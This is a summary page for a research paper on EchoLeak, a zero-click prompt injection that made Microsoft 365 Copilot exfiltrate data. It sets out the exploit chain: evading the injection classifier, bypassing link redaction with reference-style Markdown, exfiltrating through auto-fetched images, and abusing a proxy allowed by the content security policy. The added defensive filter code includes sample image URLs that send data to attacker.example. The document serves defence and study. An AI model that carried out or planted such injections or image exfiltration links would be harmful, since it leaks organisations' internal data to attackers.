EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System
Pavan Reddy, Aditya Sanjay Gujral
Published on arXiv: 2509.10540
Categories: Prompt Injection (OWASP LLM Top 10 — LLM01); Sensitive Information Disclosure (OWASP LLM Top 10 — LLM06)
Key Finding: A single crafted email coerces Microsoft 365 Copilot into exfiltrating internal organizational data to an attacker server with zero user interaction, bypassing all deployed prompt injection defenses via a four-stage exploit chain.
Novel technique introduced: EchoLeak
Large language model (LLM) assistants are increasingly integrated into enterprise workflows, raising new security concerns as they bridge internal and external data sources. This paper presents an in-depth case study of EchoLeak (CVE-2025-32711), a zero-click prompt injection vulnerability in Microsoft 365 Copilot that enabled remote, unauthenticated data exfiltration via a single crafted email. By chaining multiple bypasses (evading Microsoft's XPIA (Cross Prompt Injection Attempt) classifier, circumventing link redaction with reference-style Markdown, exploiting auto-fetched images, and abusing a Microsoft Teams proxy allowed by the content security policy), EchoLeak achieved full privilege escalation across LLM trust boundaries without user interaction. We analyze why existing defenses failed and outline a set of engineering mitigations, including prompt partitioning, enhanced input/output filtering, provenance-based access control, and strict content security policies. Beyond the specific exploit, we derive generalizable lessons for building secure AI copilots, emphasizing the principle of least privilege, defense-in-depth architectures, and continuous adversarial testing. Our findings establish prompt injection as a practical, high-severity vulnerability class in production AI systems and provide a blueprint for defending against future AI-native threats.
Key Contributions
- First documented zero-click indirect prompt injection exploit in a production LLM system (CVE-2025-32711), chaining XPIA classifier evasion, reference-style Markdown redaction bypass, auto-fetched image exfiltration, and CSP-allowed Teams proxy abuse for unauthenticated data theft
- Root-cause analysis of why existing LLM defenses (prompt injection classifiers, link redaction, content security policies) failed to prevent the exploit chain
- Generalizable mitigation framework including prompt scope partitioning, provenance-based access control, enhanced I/O filtering, and strict CSP design for production AI copilots
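As an added illustration of the "enhanced I/O filtering" mitigation (example code written for this summary, not the paper's or Microsoft's implementation), the filter below resolves reference-style Markdown image definitions before applying a host allowlist, and it also rejects an allowlisted host whose query string carries a second URL to a non-allowlisted host, which is the CSP-permitted proxy pattern the abstract describes. All hostnames, the allowlist and the sample LLM output are constructed.

```python
"""Defensive Markdown output filter (added example, not code from the paper).
Resolves reference-style image links before applying a host allowlist, and
rejects allowlisted 'proxy' hosts whose query smuggles a second URL."""
import re
from urllib.parse import parse_qs, urlparse

# Assumed allowlist; the proxy host models a CSP-permitted service that fetches
# arbitrary URLs on the caller's behalf (the Teams-proxy pattern).
ALLOWED_IMAGE_HOSTS = {"cdn.example-corp.internal", "proxy.example-allowed.com"}
INLINE_IMG = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")    # ![alt](url "t")
REF_IMG = re.compile(r"!\[([^\]]*)\]\[([^\]]*)\]")              # ![alt][label]
REF_DEF = re.compile(r"^[ \t]*\[([^\]]+)\]:[ \t]*(\S+)", re.M)  # [label]: url

def url_is_allowed(url: str) -> bool:
    """https, allowlisted host, and no query value that is itself a URL to a
    non-allowlisted host (the open-proxy exfiltration path)."""
    p = urlparse(url)
    if p.scheme != "https" or p.hostname not in ALLOWED_IMAGE_HOSTS:
        return False
    for values in parse_qs(p.query).values():
        for nested in map(urlparse, values):
            if nested.scheme and nested.hostname not in ALLOWED_IMAGE_HOSTS:
                return False
    return True

def collect_image_urls(markdown: str) -> list[str]:
    """Every URL a renderer would auto-fetch as an image, inline or by reference."""
    defs = {k.lower(): v for k, v in REF_DEF.findall(markdown)}
    urls = [u for _, u in INLINE_IMG.findall(markdown)]
    for alt, label in REF_IMG.findall(markdown):
        key = (label or alt).lower()  # ![alt][] uses the alt text as the label
        if key in defs:
            urls.append(defs[key])
    return urls

def filter_markdown(markdown: str) -> tuple[str, list[str]]:
    """Strip disallowed images and their definitions; return (text, blocked)."""
    defs = {k.lower(): v for k, v in REF_DEF.findall(markdown)}
    blocked = [u for u in collect_image_urls(markdown) if not url_is_allowed(u)]
    def ref_ok(m):
        key = (m.group(2) or m.group(1)).lower()
        return key not in defs or url_is_allowed(defs[key])
    out = INLINE_IMG.sub(lambda m: m.group(0) if url_is_allowed(m.group(2)) else "[image removed]", markdown)
    out = REF_IMG.sub(lambda m: m.group(0) if ref_ok(m) else "[image removed]", out)
    out = REF_DEF.sub(lambda m: m.group(0) if url_is_allowed(m.group(2)) else "", out)
    return out, blocked

SAMPLE = (  # constructed LLM output: one legitimate image plus two exfiltration attempts
    "![chart][c1]\n![leak](https://attacker.example/i.png?q=data)\n"
    "![ok](https://cdn.example-corp.internal/chart.png)\n\n"
    "[c1]: https://proxy.example-allowed.com/fetch?url=https://attacker.example/x.png\n"
)

if __name__ == "__main__":
    print(filter_markdown(SAMPLE))
```

A renderer that auto-fetches images would otherwise request both attacker URLs with no user click; the returned `blocked` list is what a detection pipeline should log.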